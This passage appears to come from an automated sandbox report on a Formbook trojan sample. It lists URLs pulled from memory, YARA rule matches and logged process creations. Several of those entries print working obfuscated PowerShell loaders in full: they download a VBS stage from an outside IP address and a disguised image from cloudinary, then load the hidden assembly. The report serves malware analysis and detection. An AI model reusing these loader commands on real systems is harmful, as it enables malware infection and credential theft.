                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/Toyota_Avensis.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK8
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/Toyota_F1.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK82%2Fl
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/Vintage_Car_Auctions.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/__media__/design/underconstructionnotice.php?d=inastra.online
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/__media__/js/trademark.php?d=inastra.online&type=ns
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/display.cfm
                  Source: powershell.exe, 00000003.00000002.2203096096.0000000008A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cjz
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4516216085.0000000006C64000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qmmkl.buzz
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4516216085.0000000006C64000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qmmkl.buzz/e3vj/
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000003.00000002.2198089199.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440544161.0000000004B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                  Source: firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000059A6000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000006006000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://libs.jshub.com/font-awesome/5.10.0-12/css/fontawesome.min.css
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000059A6000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000006006000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://libs.jshub.com/font-awesome/5.10.0-12/css/solid.min.css
                  Source: powershell.exe, 00000003.00000002.2203096096.0000000008A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comJ
                  Source: powershell.exe, 00000003.00000002.2199749880.0000000006336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2473607198.00000000076AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000059A6000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000006006000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.ngxfence.com

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenistaJump to behavior
                  Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 5988, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQo